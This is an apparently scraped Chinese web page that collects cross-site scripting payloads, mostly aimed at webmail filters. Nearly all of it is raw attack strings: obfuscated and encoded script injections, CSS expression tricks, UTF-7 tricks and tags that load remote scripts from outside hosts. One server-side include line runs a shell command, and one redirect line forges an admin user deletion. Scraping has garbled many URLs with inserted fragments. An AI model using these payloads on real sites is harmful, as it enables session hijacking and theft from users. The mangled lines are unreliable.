"<IMG SRC=java\0script:alert(\"XSS\")>";' > out 

<IMG SRC=" javascript:alert('XSS');"> 

<SCRIPT>a=/XSS/alert(a.source)</SCRIPT> 

<BODY BACKGROUND="javascript:alert('XSS')"> 

<BODY ONLOAD=alert('XSS')> 

<IMG DYNSRC="javascript:alert('XSS')"> 

<IMG LOWSRC="javascript:alert('XSS')"> 

<BGSOUND SRC="javascript:alert('XSS');"> 

<br size="&{alert('XSS')}"> 

<LAYER SRC="http://HdhCmsTestnspcn.org/xss/a.js"></layer> 

<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> 

<IMG SRC='vbscript:msgbox("XSS")'> 

<IMG SRC="mocha:[code]"> 

<IMG SRC="livescript:[code]"> 

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> 

<IFRAME SRC=javascript:alert('XSS')></IFRAME> 

<FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET> 

<TABLE BACKGROUND="javascript:alert('XSS')"> 

<DIV STYLE="background-image: url(javascript:alert('XSS'))"> 

<DIV STYLE="behaviour: url('http://HdhCmsTesthow-to-hack.org/exploit.html');"> 

<DIV STYLE="width: expression(alert('XSS'));"> 

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> 

<IMG STYLE='xss:expre\ssion(alert("XSS"))'> 

<STYLE TYPE="text/javascript">alert('XSS');</STYLE> 

<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> 

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> 

<BASE HREF="javascript:alert('XSS');//"> 

getURL("javascript:alert('XSS')") 

a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d); 

<XML SRC="javascript:alert('XSS');"> 

"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><" 

<SCRIPT SRC=http://up.2cto测试数据/2012/1218/20121218013340384.jpg"></SCRIPT> 

<IMG SRC="javascript:alert('XSS')" 

<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://HdhCmsTestnspcn.org/xss/a.js></SCRIPT>'"--> 

<SCRIPT a=">" SRC="http://HdhCmsTestnspcn.org/xss/a.js"></SCRIPT> 

<SCRIPT =">" SRC="http://HdhCmsTestnspcn.org/xss/a.js"></SCRIPT> 

<SCRIPT a=">" '' SRC="http://HdhCmsTestnspcn.org/xss/a.js"></SCRIPT> 

<SCRIPT "a='>'" SRC="http://HdhCmsTestnspcn.org/xss/a.js"></SCRIPT> 

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://HdhCmsTestnspcn.org/xss/a.js"></SCRIPT> 

<A HREF=http://HdhCmsTestgohttp://HdhCmsTestgoogle测试数据/ogle测试数据/>link</A> 

 

 

 

 

 

 

 

 

---------

 

 

 

 

<!--[if true]><img onerror=alert(1) src=-->

<form action=javascript:alert(1)><input type=submit>

<input autofocus onfocus=alert(1)>

<select autofocus onfocus=alert(1)>

<textarea autofocus onfocus=alert(1)>

<keygen autofocus onfocus=alert(1)>

<img src=1 language=vbs onerror=msgbox+1>

<img src=1 language=vbscript onerror=msgbox+1>

<img src=1 onerror=vbs:msgbox+1>

 

<b/alt="1"onmouseover=InputBox+1 language=vbs>test</b>

<iframe onreadystatechange=alert(1)>

<style onreadystatechange=alert(1)>

<script onreadystatechange=alert(1)></script>

<iframe onreadystatechange=alert(1)></iframe>

<style onreadystatechange=alert(1)></style>

<xml onreadystatechange=alert(1)>

<xml onreadystatechange=alert(1)>test</xml>

<object type=image src=http://up.2cto测试数据/2012/1218/20121218013340565.gif onreadystatechange=alert(1)></object>

<img type=image src=http://up.2cto测试数据/2012/1218/20121218013340565.gif onreadystatechange=alert(1)>

<image type=image src=http://up.2cto测试数据/2012/1218/20121218013340565.gif onreadystatechange=alert(1)>

<input type=image src=http://up.2cto测试数据/2012/1218/20121218013340565.gif onreadystatechange=alert(1)>

<isindex type=image src=http://up.2cto测试数据/2012/1218/20121218013340565.gif onreadystatechange=alert(1)>

<object data=anything_at_all.pdf><param name=src value="http://p42.us/xss.pdf"></param></object>

<img src="x onerror=alert(1)//[^"]*  >

 

<a href='data:text/xml,<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html [ <!ENTITY inject "&#60;script&#62;alert(1)&#60;/script&#62;">]><html xmlns="http://HdhCmsTestw3.org/1999/xhtml">&inject;</html>'>haha</a>

 

This used to work on FF <=3.0 

@import 'data:text/css,* { -moz-binding:url(http://HdhCmsTestbusinessinfo.co.uk/labs/xbl/xbl.xml#xss) }';

 

CSS expressions I could go on all night :)

 

<div style="xss:exp\00ression(window.x?0:(alert(/XSS/),window.x=1));"></div>

<div style="\0078\0073\0073:\0065\0078\0070\0072\0065\0073\0073\0069\006f\006e(window.x?0:(alert(/XSS/),window.x=1));"></div>

<div style="\0078 \0073 \0073: \0065 \0078 \0070 \0072 \0065 \0073 \0073 \0069 \006f \006e(window.x?0:(alert(/XSS/),window.x=1));"></div>

<div style="xss:\000065\000078\00070\00072\00065\000073\00073\00069\0006f\006e(window.x?0:(alert(/XSS/),window.x=1));"></div>

<div style="xs\0s:e\x\pression\(window.x?0:(alert(/XSS/),window.x=1)\);"></div>

<div style="\0078\0073\0073:\0065&#65279;\0078&#65279;\0070&#65279;\0072&#65279;\0065&#65279;\0073&#65279;\0073&#65279;\0069&#65279;\006f&#65279;\006e&#65279;(window.x?0:(alert(/XSS/),window.x=1));"></div>

<div style="\0078\0073\0073&#62&#58&#92&#48&#48&#54&#53&#92&#48&#48&#55&#56&#92&#48&#48&#55&#48&#92&#48&#48&#55&#50&#92&#48&#48&#54&#53&#92&#48&#48&#55&#51&#92&#48&#48&#55&#51&#92&#48&#48&#54&#57&#92&#48&#48&#54&#102&#92&#48&#48&#54&#101(window.x?0:(alert(/XSS/),window.x=1));"></div>

<div style="\0000000000078\0000000000073s:e&#x5c;&#x78;p/*tbeorhf*/ression(window.x?0:(alert(/XSS/),window.x=1));"></div>

 

Encoded comments:-

<div style="xss:ex&#47;&#42;&#79;&#77;&#71;&#42;&#47;pression(window.x?0:(alert(/XSS/),window.x=1));"></div>

 

The VB example doesn't require () :-

<IMG SRC=a onerror='vbscript:msgbox"XSS"'>

 

And how about vbs: 

<img src=1 onerror="vbs:MsgBox 1">

<?xml version="1.0" encoding="utf-7"?>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- 

<&#383;cript>

 

 

 

 

---------

 

 

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert(&quot;XSS&quot;)>

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

 

 

<IMG

SRC

=

"

j

a

v

a

s

c

r

i

p

t

:

a

l

e

r

t

(

'

X

S

S

'

)

"

>

 

 

<IMG SRC=" &#14;  javascript:alert('XSS');">

 

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

 

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

 

<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

 

<<SCRIPT>alert("XSS");//<</SCRIPT>

 

<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>

 

<SCRIPT SRC=//ha.ckers.org/.j>

 

<IMG SRC="javascript:alert('XSS')"

 

<iframe src=http://ha.ckers.org/scriptlet.html <

 

<SCRIPT>a=/XSS/

alert(a.source)</SCRIPT>

\";alert('XSS');//

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert('XSS')>

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<BGSOUND SRC="javascript:alert('XSS');">

<BR SIZE="&{alert('XSS')}">

<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">

<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>

<XSS STYLE="behavior: url(xss.htc);">

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

<IMG SRC='vbscript:msgbox("XSS")'>

<IMG SRC="mocha:[code]">

<IMG SRC="livescript:[code]">

?script?alert(¢XSS¢)?/script?

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

<DIV STYLE="width: expression(alert('XSS'));">

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

<XSS STYLE="xss:expression(alert('XSS'))">

 

exp/*<A STYLE='no\xss:noxss("*//*");

xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>

 

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

 

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

 

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

 

<!--[if gte IE 4]>

<SCRIPT>alert('XSS');</SCRIPT>

<![endif]-->

 

<BASE HREF="javascript:alert('XSS');//">

<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>

 

<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>

 

----------------------------------------------------------------------------------------------

<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

 

----------------------------------------------------------------------------------------------

<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDA vc 3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

 

 

----------------------------------------------------------------------------------------------

a="get";

b="URL(\"";

c="javascript:";

d="alert('XSS');\")";

eval(a+b+c+d);

 

----------------------------------------------------------------------------------------------

<HTML xmlns:xss>

  <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">

  <xss:xss>XSS</xss:xss>

</HTML>

 

<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

 

<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML>

<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

 

<XML SRC="xsstest.xml" ID=I></XML>

 

HdhCmsTest2cto测试数据

<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

 

 

 

----------------------------------------------------------------------------------------------

<HTML><BODY>

<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

<?import namespace="t" implementation="#default#time2">

<t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;">

</BODY></HTML>

 

 

----------------------------------------------------------------------------------------------

 

 

<SCRIPT SRC=http://up.2cto测试数据/2012/1218/20121218013402420.jpg"></SCRIPT>

 

 

 

<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->

 

<? echo('<SCR)';

echo('IPT>alert("XSS")</SCRIPT>'); ?>

 

 

 

<IMG SRC="http://HdhCmsTestthesiteyouareon测试数据/somecommand.php?somevariables=maliciouscode">

 

Redirect 302 /a.jpg http://victimsite测试数据/admin.asp&deleteuser

 

<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">

 

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/ html ; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

 

 

----------------------------------------------------------------------------------------------

<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

 

<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

 

<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>

 

<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

 

<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>

 

<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>

 

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

 

----------------------------------------------------------------------------------------------

 

<A HREF="http://66.102.7.147/">XSS</A>

 

<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>

 

<A HREF="http://1113982867/">XSS</A>

 

<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>

 

<A HREF="http://0102.0146.0007.00000223/">XSS</A>

 

<A HREF="h

tt p://6&#9;6.000146.0x7.147/">XSS</A>

 

<A HREF="//HdhCmsTestgoogle测试数据/">XSS</A>

 

<A HREF="//google">XSS</A>

 

<A HREF="http://ha.ckers.org@google">XSS</A>

 

<A HREF="http://google:ha.ckers.org">XSS</A>

 

<A HREF="http://google测试数据/">XSS</A>

 

<A HREF="http://HdhCmsTestgoogle测试数据./">XSS</A>

 

<A HREF="javascript:document.location='http://HdhCmsTestgoogle测试数据/'">XSS</A>

 

<A HREF="http://HdhCmsTestgohttp://HdhCmsTestgoogle测试数据/ogle测试数据/">XSS</A>

 

查看更多关于邮箱跨站代码收集 - 网站安全 - 自学php的详细内容...

  阅读:42次